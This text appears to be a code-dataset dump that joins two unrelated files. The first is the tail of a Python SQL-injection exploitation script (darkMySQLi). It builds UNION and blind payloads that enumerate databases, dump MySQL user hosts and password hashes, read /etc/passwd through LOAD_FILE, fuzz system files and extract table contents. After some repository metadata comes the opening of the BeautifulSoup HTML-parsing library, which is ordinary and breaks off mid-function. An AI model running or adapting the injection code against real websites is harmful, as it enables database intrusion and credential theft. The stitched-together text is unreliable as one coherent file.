;-)\n" if len(match) == 0: print "\n[-] The String you used has not been found in the target URL!\n[-] Please try another.\n[-] Done.\n" sys.exit(1) if len(match) == 1: print "[+] Blind String Selected is Good ;-)";file.write("\n[+] Blind String Selected is Good ;-)") #Column Finder c0de if mode == "--findcol": print "[+] Attempting To find the number of columns...";file.write("\n[+] Attempting To find the number of columns...") print "[+] Testing: ", file.write("\n[+] Testing: ",) checkfor=[];nullFound=[];nullnum=[];makepretty = "" sitenew = site+"+AND+1=2+UNION+SELECT+" for x in xrange(1,colMax): try: sys.stdout.write("%s," % (x)) file.write(str(x)+",") sys.stdout.flush() darkc0de = "dark"+str(x)+"code" checkfor.append(darkc0de) if x > 1: sitenew += "," sitenew += "0x"+darkc0de.encode("hex") finalurl = sitenew+arg_end source = GetThatShit(finalurl) for y in checkfor: colFound = re.findall(y,source) if len(colFound) != 0: nullFound.append(colFound[0]) if len(nullFound) >= 1: print "\n[+] Column Length is:",len(checkfor);file.write("\n[+] Column Length is: "+str(len(checkfor))) print "[+] Found null column at column #: ",;file.write("\n[+] Found null column at column #: ",) for z in nullFound: nullcol = re.findall(("\d+"),z) nullnum.append(nullcol[0]) sys.stdout.write("%s," % (nullcol[0])) file.write(str(nullcol[0])+",") sys.stdout.flush() for z in xrange(0,len(checkfor)): z+=1 if z > 1: makepretty += "," makepretty += str(z) site = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva+makepretty+arg_end print "\n\n[!] SQLi URL:",site;file.write("\n\n[!] SQLi URL: "+site) for z in nullnum: site = site.replace("+"+z+",","+darkc0de,") site = site.replace(","+z+",",",darkc0de,") site = site.replace(","+z+arg_end,",darkc0de"+arg_end) print "[!] darkMySQLi URL:",site;file.write("\n[!] darkMySQLi URL: "+site) print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X")) print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets)) print "[-] Done\n";file.write("\n[-] Done\n") print "Don't forget to check", logfile,"\n" file.close();sys.exit(1) except (KeyboardInterrupt, SystemExit): raise except: pass print "\n[!] Sorry Column Length could not be found." file.write("\n[!] Sorry Column Length could not be found.") print "[-] You might try to change colMax variable or change evasion option.. or last but not least do it manually!" print "[-] Done\n" sys.exit(1) #Retrieve version:user:database if arg_blind != "--blind": head_URL = site.replace("darkc0de","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end print "[+] Gathering MySQL Server Configuration...";file.write("\n[+] Gathering MySQL Server Configuration...\n") source = GetThatShit(head_URL) match = re.findall("\x1e\x1e\S+",source) if len(match) >= 1: match = match[0][0:].split("\x1e") version = match[2] user = match[3] database = match[4] print "\tDatabase:", database;file.write("\tDatabase: "+database+"\n") print "\tUser:", user;file.write("\tUser: "+user+"\n") print "\tVersion:", version;file.write("\tVersion: "+version) else: print "\n[-] There seems to be a problem with your URL. 
Please check and try again.\n[DEBUG]:",head_URL.replace("+",arg_eva),"\n" sys.exit(1) else: print "[+] Preforming Quick MySQL Version Check...";file.write("\n[+] Preforming Quick MySQL Version Check...") while 1: config_URL = site+"+and+substring(@@version,1,1)="+str(ser_ver) source = GetThatShit(config_URL) match = re.findall(arg_string,source) if len(match) >= 1: print "\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!";file.write("\n\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!") version += str(ser_ver) break if ser_ver == 6: print "[-] Was unable to determine MySQL version.\n[-] Done" sys.exit(1) ser_ver+=1 #lets check what we can do based on version if mode == "--schema" or mode == "--dbs" or mode == "--full": if version[0] == str(4): print "\n[-] Mode Selected is incompatible with MySQL v4 Servers" print "[-] -h for help" sys.exit(1) # Mode --info if mode == "--info" and arg_blind != "--blind": head_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+mysql.user"+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) >= 1: yesno = "YES <-- w00t w00t" else: yesno = "NO" print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno)) if yesno == "YES <-- w00t w00t": print "\n[+] Dumping MySQL user info. host:user:password";file.write("\n\n[+] Dumping MySQL user info. host:user:password") head_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+mysql.user"+arg_end source = GetThatShit(head_URL) match = re.findall("\x1e\x1e\S+",source);match = match[0].strip("\x1e").split("\x1e");userend = match[0] print "[+] Number of users in the mysql.user table:",userend;file.write("[+] Number of users in the mysql.user table: "+str(userend)) head_URL = site.replace("darkc0de","concat(0x1e,0x1e,host,0x1e,user,0x1e,password,0x1e,0x20)") head_URL = head_URL+"+FROM+mysql.user+LIMIT+NUM,1"+arg_end for x in range(0,int(userend)): try: source = GetThatShit(head_URL.replace("NUM",str(x))) match = re.findall("\x1e\x1e\S+",source) match = match[0].strip("\x1e").split("\x1e") if len(match) != 3: nullvar = "NULL" match += nullvar print "\t["+str(x)+"]",match[0]+":"+match[1]+":"+match[2];file.write("\n["+str(x)+"] "+str(match[0])+":"+str(match[1])+":"+str(match[2])) except (KeyboardInterrupt, SystemExit): raise except: pass else: print "\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!" file.write("\n\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!") head_URL = site.replace("darkc0de","concat(load_file(0x2f6574632f706173737764),0x3a,0x6461726b63306465)")+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) >= 1: yesno = "YES <-- w00t w00t" else: yesno = "NO" print "\n[+] Do we have Access to Load_File:",yesno;file.write("\n\n[+] Do we have Access to Load_File: "+str(yesno)) if yesno == "YES <-- w00t w00t": fuzz_load = open(loadfilefuzz, "r").readlines() head_URL = site.replace("darkc0de","concat(load_file('%2Fetc%2Fpasswd'),0x3a,0x6461726b63306465)")+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) > 1: onoff = "OFF <-- w00t w00t" else: onoff = "ON" print "\n[+] Magic quotes are:",onoff yesno = str(raw_input("\n[!] 
Would You like to fuzz LOAD_FILE (Yes/No): ")) if yesno == "Y" or yesno == "y" or yesno == "Yes" or yesno == "yes": print "\n[+] Starting Load_File Fuzzer...";file.write("\n\n[+] Starting Load_File Fuzzer...") print "[+] Number of system files to be fuzzed:",len(fuzz_load),"\n";file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_load))+"\n") for sysfile in fuzz_load: sysfile = sysfile.rstrip("\n") if proxy != "None": sysfile = sysfile.replace("/","%2F") sysfile = sysfile.replace(".","%2E") if onoff == "OFF <-- w00t w00t": head_URL = site.replace("darkc0de","concat(LOAD_FILE(\'"+sysfile+"\'),0x3a,0x6461726b63306465)")+arg_end else: head_URL = site.replace("darkc0de","concat(LOAD_FILE(0x"+sysfile.encode("hex")+"),0x3a,0x6461726b63306465)")+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) > 0: print "[!] Found",sysfile;file.write("\n[!] Found "+sysfile) head_URL = head_URL.replace("concat(","") head_URL = head_URL.replace(",0x3a,0x6461726b63306465)","") print "[!]",head_URL;file.write("\n[!] "+head_URL) else: print "\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!" file.write("\n\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!") #Fuzz table/columns if mode == "--fuzz": fuzz_tables = open(tablefuzz, "r").readlines() fuzz_columns = open(columnfuzz, "r").readlines() print "[+] Beginning table and column fuzzer...";file.write("[+] Beginning table and column fuzzer...") print "[+] Number of tables names to be fuzzed:",len(fuzz_tables);file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_tables))) print "[+] Number of column names to be fuzzed:",len(fuzz_columns);file.write("\n[+] Number of column names to be fuzzed: "+str(len(fuzz_columns))) print "[+] Searching for tables and columns...";file.write("\n[+] Searching for tables and columns...") if arg_blind == "--blind": fuzz_URL = site+"+and+(SELECT+1+from+TABLE+limit+0,1)=1" else: fuzz_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+TABLE"+arg_end for table in fuzz_tables: table = table.rstrip("\n") table_URL = fuzz_URL.replace("TABLE",table) source = GetThatShit(table_URL) if arg_blind == "--blind": match = re.findall(arg_string,source) else: match = re.findall("darkc0de", source); if len(match) > 0: print "\n[!] Found a table called:",table;file.write("\n\n[+] Found a table called: "+str(table)) print "\n[+] Now searching for columns inside table \""+table+"\"";file.write("\n\n[+] Now searching for columns inside table \""+str(table)+"\"") if arg_blind == "--blind": table_URL = site+"+and+(SELECT+substring(concat(1,COLUMN),1,1)+from+"+table+"+limit+0,1)=1" for column in fuzz_columns: column = column.rstrip("\n") if arg_blind == "--blind": column_URL = table_URL.replace("COLUMN",column) else: column_URL = table_URL.replace("0x6461726b63306465","concat(0x6461726b63306465,0x3a,"+column+")") source = GetThatShit(column_URL) if arg_blind == "--blind": match = re.findall(arg_string,source) else: match = re.findall("darkc0de",source) if len(match) > 0: print "[!] Found a column called:",column;file.write("\n[!] 
Found a column called:"+column) print "[-] Done searching inside table \""+table+"\" for columns!";file.write("\n[-] Done searching inside table \""+str(table)+"\" for columns!") #Build URLS for each different mode if mode == "--schema": if arg_database != "None" and arg_table == "None": if arg_blind == "--blind": print "[+] Showing Tables from database \""+arg_database+"\"";file.write("\n[+] Showing Tables from database \""+arg_database+"\"") count_URL = site+"+and+((SELECT+COUNT(table_name)" count_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex")+"))" line_URL = site+"+and+ascii(substring((SELECT+table_name" line_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex") else: print "[+] Showing Tables & Columns from database \""+arg_database+"\"" file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"") line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += "+FROM+information_schema.columns+WHERE+table_schema=0x"+arg_database.encode("hex") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(table_schema),0x1e,0x20)") count_URL += "+FROM+information_schema.tables+WHERE+table_schema=0x"+arg_database.encode("hex") arg_row = "Tables" if arg_database != "None" and arg_table != "None": if arg_blind == "--blind": print "[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"" file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"") count_URL = site+"+and+((SELECT+COUNT(column_name)" count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")+"))" line_URL = site+"+and+ascii(substring((SELECT+column_name" line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex") else: print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\"" file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"") line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex") arg_row = "Columns" elif mode == "--dump": print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"" file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"") print "[+] and Column(s) "+str(arg_columns);file.write("\n[+] Column(s) "+str(arg_columns)) if arg_blind == "--blind": darkc0de = "" for column in arg_columns: darkc0de += column+",0x3a," darkc0de = darkc0de.rstrip("0x3a,") count_URL = site+"+and+((SELECT+COUNT(*)+FROM+"+arg_database+"."+arg_table line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+"+arg_database+"."+arg_table else: for column in arg_columns: darkc0de += column+",0x1e," count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table line_URL = 
site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table if arg_where != "" or arg_orderby != "": if arg_where != "": arg_where = arg_where.split(",") print "[+] WHERE clause:","\""+arg_where[0]+"="+arg_where[1]+"\"" arg_where = "WHERE+"+arg_where[0]+"="+"0x"+arg_where[1].encode("hex") if arg_orderby != "": arg_orderby = "ORDER+BY+'"+arg_orderby+"'" print "[+] ORDERBY clause:",arg_orderby count_URL += "+"+arg_where line_URL += "+"+arg_where+"+"+arg_orderby if version[0] == 4: count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_table line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_table elif mode == "--full": print "[+] Starting full SQLi information_schema enumeration..." line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex") elif mode == "--dbs": print "[+] Showing all databases current user has access too!" file.write("\n[+] Showing all databases current user has access too!") if arg_blind == "--blind": count_URL = site+"+and+((SELECT+COUNT(schema_name)" count_URL += "+FROM+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")+"))" line_URL = site+"+and+ascii(substring((SELECT+schema_name" line_URL += "+from+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex") else: count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex") line_URL = site.replace("darkc0de","concat(0x1e,0x1e,schema_name,0x1e,0x20)") line_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex") arg_row = "Databases" if arg_blind == "--blind": count_URL+="))" line_URL+="+LIMIT+" else: count_URL += arg_end line_URL += "+LIMIT+NUM,1"+arg_end ## Blind Info --- I know it doesnt make sence where this code is.. but.. fuck it... if mode == "--info" and arg_blind == "--blind": head_URL = site+"+and+(SELECT+1+from+mysql.user+limit+0,1)=1" source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 1: yesno = "YES <-- w00t w00t\n[!] Retrieve Info: --dump -D mysql -T user -C user,password" else: yesno = "NO" print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno)) print "\n[+] Showing database version, username@location, and database name!" 
file.write("\n\n[+] Showing database version, username@location, and database name!") line_URL = site+"+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database()))," row_value = 1 #Lets Count how many rows or columns if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full": if arg_blind == "--blind": row_value = GuessValue(count_URL) else: source = GetThatShit(count_URL) match = re.findall("\x1e\x1e\S+",source) match = match[0][2:].split("\x1e") row_value = match[0] print "[+] Number of "+arg_row+": "+str(row_value);file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n") ## UNION Schema Enumeration and DataExt loop if arg_blind == "--union": if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full": while int(table_num) != int(row_value): try: source = GetThatShit(line_URL.replace("NUM",str(num))) match = re.findall("\x1e\x1e\S+",source) if len(match) >= 1: if mode == "--schema" or mode == "--full": match = match[0][2:].split("\x1e") if cur_db != match[0]: cur_db = match[0] if table_num == 0: print "\n[Database]: "+match[0];file.write("\n[Database]: "+match[0]+"\n") else: print "\n\n[Database]: "+match[0];file.write("\n\n[Database]: "+match[0]+"\n") print "[Table: Columns]";file.write("[Table: Columns]\n") if cur_table != match[1]: print "\n["+str(table_num+1)+"]"+match[1]+": "+match[2], file.write("\n["+str(table_num+1)+"]"+match[1]+": "+match[2]) cur_table = match[1] #table_num+=1 table_num = int(table_num) + 1 else: sys.stdout.write(",%s" % (match[2])) file.write(","+match[2]) sys.stdout.flush() #Gathering Databases only elif mode == "--dbs": match = match[0] if table_num == 0: print "\n["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match)) else: print "["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match)) table_num+=1 #Collect data from tables & columns elif mode == "--dump": match = re.findall("\x1e\x1e+.+\x1e\x1e",source) if match == []: match = [''] else: match = match[0].strip("\x1e").split("\x1e") if arg_rowdisp == 1: print "\n["+str(num+1)+"] ",;file.write("\n["+str(num+1)+"] ",) else: print;file.write("\n") for ddata in match: if ddata == "": ddata = "NoDataInColumn" sys.stdout.write("%s:" % (ddata)) file.write("%s:" % ddata) sys.stdout.flush() table_num+=1 else: if mode == "--dump": table_num+=1 sys.stdout.write("\n[%s] No data" % (num)) file.write("\n[%s] No data" % (num)) break num+=1 except (KeyboardInterrupt, SystemExit): raise except: pass ## Blind Schema Enumeration and DataExt loop if arg_blind == "--blind": if mode == "--schema" or mode == "--dbs" or mode == "--dump" or mode == "--info": lower_bound = 0 upper_bound = 127 print for data_row in range(int(num), row_value): sys.stdout.write("[%s]: " % (lim_num)) file.write("\n[%s]: " % (lim_num)) sys.stdout.flush() value = chr(upper_bound) while value != chr(0): if mode == "--info": Guess_URL = line_URL + str(let_pos)+",1))" else: Guess_URL = line_URL + str(lim_num) +",1),"+str(let_pos)+",1))" value = chr(GuessValue(Guess_URL)) sys.stdout.write("%s" % (value)) file.write(value) sys.stdout.flush() let_pos+=1 print lim_num = int(lim_num) + 1 let_pos = 1 data_row+=1 #Lets wrap it up! 
if mode == "--schema" or mode == "--full" or mode == "--dump": print "\n\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X")) else: print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X")) print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets)) print "[-] Done\n";file.write("\n[-] Done\n") print "Don't forget to check", logfile,"\n" file.close()
51,001
Python
.py
902
40.178492
175
0.469678
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
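For blind injection, DarkMySQLi's GuessValue() never reads data off the page; it bisects over ASCII values, asking the target whether ascii(substring(...)) is greater than a midpoint and halving the candidate range on every request, so one character costs about log2(128) = 7 requests instead of up to 127. Here is a minimal sketch of that bisection with the HTTP round trip replaced by a local callable; guess_byte, oracle, and secret are illustrative names that do not appear in the tool.

# Sketch of the binary search inside GuessValue(). Each oracle(mid) call
# stands in for one HTTP request whose page matches --string exactly when
# the hidden byte is greater than mid. Bounds 0..127 match the tool's
# blind-extraction loop (lower_bound = 0, upper_bound = 127).
def guess_byte(oracle, lower=0, upper=127):
    while lower < upper:
        mid = (lower + upper) // 2
        if oracle(mid):       # truthy: hidden byte > mid
            lower = mid + 1
        else:
            upper = mid
    return lower

secret = ord('r')                                   # pretend hidden byte
print(chr(guess_byte(lambda mid: secret > mid)))    # -> r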
18,913
BeautifulSoup.py
pwnieexpress_raspberry_pwn/src/pentest/plecost/BeautifulSoup.py
"""Beautiful Soup Elixir and Tonic "The Screen-Scraper's Friend" http://www.crummy.com/software/BeautifulSoup/ Beautiful Soup parses a (possibly invalid) XML or HTML document into a tree representation. It provides methods and Pythonic idioms that make it easy to navigate, search, and modify the tree. A well-formed XML/HTML document yields a well-formed data structure. An ill-formed XML/HTML document yields a correspondingly ill-formed data structure. If your document is only locally well-formed, you can use this library to find and process the well-formed part of it. Beautiful Soup works with Python 2.2 and up. It has no external dependencies, but you'll have more success at converting data to UTF-8 if you also install these three packages: * chardet, for auto-detecting character encodings http://chardet.feedparser.org/ * cjkcodecs and iconv_codec, which add more encodings to the ones supported by stock Python. http://cjkpython.i18n.org/ Beautiful Soup defines classes for two main parsing strategies: * BeautifulStoneSoup, for parsing XML, SGML, or your domain-specific language that kind of looks like XML. * BeautifulSoup, for parsing run-of-the-mill HTML code, be it valid or invalid. This class has web browser-like heuristics for obtaining a sensible parse tree in the face of common HTML errors. Beautiful Soup also defines a class (UnicodeDammit) for autodetecting the encoding of an HTML or XML document, and converting it to Unicode. Much of this code is taken from Mark Pilgrim's Universal Feed Parser. For more than you ever wanted to know about Beautiful Soup, see the documentation: http://www.crummy.com/software/BeautifulSoup/documentation.html Here, have some legalese: Copyright (c) 2004-2009, Leonard Richardson All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the the Beautiful Soup Consortium and All Night Kosher Bakery nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE, DAMMIT. 
""" from __future__ import generators __author__ = "Leonard Richardson (leonardr@segfault.org)" __version__ = "3.0.8" __copyright__ = "Copyright (c) 2004-2009 Leonard Richardson" __license__ = "New-style BSD" from sgmllib import SGMLParser, SGMLParseError import codecs import markupbase import types import re import sgmllib try: from htmlentitydefs import name2codepoint except ImportError: name2codepoint = {} try: set except NameError: from sets import Set as set #These hacks make Beautiful Soup able to parse XML with namespaces sgmllib.tagfind = re.compile('[a-zA-Z][-_.:a-zA-Z0-9]*') markupbase._declname_match = re.compile(r'[a-zA-Z][-_.:a-zA-Z0-9]*\s*').match DEFAULT_OUTPUT_ENCODING = "utf-8" def _match_css_class(str): """Build a RE to match the given CSS class.""" return re.compile(r"(^|.*\s)%s($|\s)" % str) # First, the classes that represent markup elements. class PageElement(object): """Contains the navigational information for some part of the page (either a tag or a piece of text)""" def setup(self, parent=None, previous=None): """Sets up the initial relations between this element and other elements.""" self.parent = parent self.previous = previous self.next = None self.previousSibling = None self.nextSibling = None if self.parent and self.parent.contents: self.previousSibling = self.parent.contents[-1] self.previousSibling.nextSibling = self def replaceWith(self, replaceWith): oldParent = self.parent myIndex = self.parent.index(self) if hasattr(replaceWith, "parent")\ and replaceWith.parent is self.parent: # We're replacing this element with one of its siblings. index = replaceWith.parent.index(replaceWith) if index and index < myIndex: # Furthermore, it comes before this element. That # means that when we extract it, the index of this # element will change. myIndex = myIndex - 1 self.extract() oldParent.insert(myIndex, replaceWith) def replaceWithChildren(self): myParent = self.parent myIndex = self.parent.index(self) self.extract() reversedChildren = list(self.contents) reversedChildren.reverse() for child in reversedChildren: myParent.insert(myIndex, child) def extract(self): """Destructively rips this element out of the tree.""" if self.parent: try: del self.parent.contents[self.parent.index(self)] except ValueError: pass #Find the two elements that would be next to each other if #this element (and any children) hadn't been parsed. Connect #the two. lastChild = self._lastRecursiveChild() nextElement = lastChild.next if self.previous: self.previous.next = nextElement if nextElement: nextElement.previous = self.previous self.previous = None lastChild.next = None self.parent = None if self.previousSibling: self.previousSibling.nextSibling = self.nextSibling if self.nextSibling: self.nextSibling.previousSibling = self.previousSibling self.previousSibling = self.nextSibling = None return self def _lastRecursiveChild(self): "Finds the last element beneath this object to be parsed." lastChild = self while hasattr(lastChild, 'contents') and lastChild.contents: lastChild = lastChild.contents[-1] return lastChild def insert(self, position, newChild): if isinstance(newChild, basestring) \ and not isinstance(newChild, NavigableString): newChild = NavigableString(newChild) position = min(position, len(self.contents)) if hasattr(newChild, 'parent') and newChild.parent is not None: # We're 'inserting' an element that's already one # of this object's children. 
if newChild.parent is self: index = self.index(newChild) if index > position: # Furthermore we're moving it further down the # list of this object's children. That means that # when we extract this element, our target index # will jump down one. position = position - 1 newChild.extract() newChild.parent = self previousChild = None if position == 0: newChild.previousSibling = None newChild.previous = self else: previousChild = self.contents[position-1] newChild.previousSibling = previousChild newChild.previousSibling.nextSibling = newChild newChild.previous = previousChild._lastRecursiveChild() if newChild.previous: newChild.previous.next = newChild newChildsLastElement = newChild._lastRecursiveChild() if position >= len(self.contents): newChild.nextSibling = None parent = self parentsNextSibling = None while not parentsNextSibling: parentsNextSibling = parent.nextSibling parent = parent.parent if not parent: # This is the last element in the document. break if parentsNextSibling: newChildsLastElement.next = parentsNextSibling else: newChildsLastElement.next = None else: nextChild = self.contents[position] newChild.nextSibling = nextChild if newChild.nextSibling: newChild.nextSibling.previousSibling = newChild newChildsLastElement.next = nextChild if newChildsLastElement.next: newChildsLastElement.next.previous = newChildsLastElement self.contents.insert(position, newChild) def append(self, tag): """Appends the given tag to the contents of this tag.""" self.insert(len(self.contents), tag) def findNext(self, name=None, attrs={}, text=None, **kwargs): """Returns the first item that matches the given criteria and appears after this Tag in the document.""" return self._findOne(self.findAllNext, name, attrs, text, **kwargs) def findAllNext(self, name=None, attrs={}, text=None, limit=None, **kwargs): """Returns all items that match the given criteria and appear after this Tag in the document.""" return self._findAll(name, attrs, text, limit, self.nextGenerator, **kwargs) def findNextSibling(self, name=None, attrs={}, text=None, **kwargs): """Returns the closest sibling to this Tag that matches the given criteria and appears after this Tag in the document.""" return self._findOne(self.findNextSiblings, name, attrs, text, **kwargs) def findNextSiblings(self, name=None, attrs={}, text=None, limit=None, **kwargs): """Returns the siblings of this Tag that match the given criteria and appear after this Tag in the document.""" return self._findAll(name, attrs, text, limit, self.nextSiblingGenerator, **kwargs) fetchNextSiblings = findNextSiblings # Compatibility with pre-3.x def findPrevious(self, name=None, attrs={}, text=None, **kwargs): """Returns the first item that matches the given criteria and appears before this Tag in the document.""" return self._findOne(self.findAllPrevious, name, attrs, text, **kwargs) def findAllPrevious(self, name=None, attrs={}, text=None, limit=None, **kwargs): """Returns all items that match the given criteria and appear before this Tag in the document.""" return self._findAll(name, attrs, text, limit, self.previousGenerator, **kwargs) fetchPrevious = findAllPrevious # Compatibility with pre-3.x def findPreviousSibling(self, name=None, attrs={}, text=None, **kwargs): """Returns the closest sibling to this Tag that matches the given criteria and appears before this Tag in the document.""" return self._findOne(self.findPreviousSiblings, name, attrs, text, **kwargs) def findPreviousSiblings(self, name=None, attrs={}, text=None, limit=None, **kwargs): """Returns the siblings 
of this Tag that match the given criteria and appear before this Tag in the document.""" return self._findAll(name, attrs, text, limit, self.previousSiblingGenerator, **kwargs) fetchPreviousSiblings = findPreviousSiblings # Compatibility with pre-3.x def findParent(self, name=None, attrs={}, **kwargs): """Returns the closest parent of this Tag that matches the given criteria.""" # NOTE: We can't use _findOne because findParents takes a different # set of arguments. r = None l = self.findParents(name, attrs, 1) if l: r = l[0] return r def findParents(self, name=None, attrs={}, limit=None, **kwargs): """Returns the parents of this Tag that match the given criteria.""" return self._findAll(name, attrs, None, limit, self.parentGenerator, **kwargs) fetchParents = findParents # Compatibility with pre-3.x #These methods do the real heavy lifting. def _findOne(self, method, name, attrs, text, **kwargs): r = None l = method(name, attrs, text, 1, **kwargs) if l: r = l[0] return r def _findAll(self, name, attrs, text, limit, generator, **kwargs): "Iterates over a generator looking for things that match." if isinstance(name, SoupStrainer): strainer = name # Special case some findAll* searches # findAll*(True) elif not limit and name is True and not attrs and not kwargs: return [element for element in generator() if isinstance(element, Tag)] # findAll*('tag-name') elif not limit and isinstance(name, basestring) and not attrs \ and not kwargs: return [element for element in generator() if isinstance(element, Tag) and element.name == name] # Build a SoupStrainer else: strainer = SoupStrainer(name, attrs, text, **kwargs) results = ResultSet(strainer) g = generator() while True: try: i = g.next() except StopIteration: break if i: found = strainer.search(i) if found: results.append(found) if limit and len(results) >= limit: break return results #These Generators can be used to navigate starting from both #NavigableStrings and Tags. def nextGenerator(self): i = self while i is not None: i = i.next yield i def nextSiblingGenerator(self): i = self while i is not None: i = i.nextSibling yield i def previousGenerator(self): i = self while i is not None: i = i.previous yield i def previousSiblingGenerator(self): i = self while i is not None: i = i.previousSibling yield i def parentGenerator(self): i = self while i is not None: i = i.parent yield i # Utility methods def substituteEncoding(self, str, encoding=None): encoding = encoding or "utf-8" return str.replace("%SOUP-ENCODING%", encoding) def toEncoding(self, s, encoding=None): """Encodes an object to a string in some encoding, or to Unicode. .""" if isinstance(s, unicode): if encoding: s = s.encode(encoding) elif isinstance(s, str): if encoding: s = s.encode(encoding) else: s = unicode(s) else: if encoding: s = self.toEncoding(str(s), encoding) else: s = 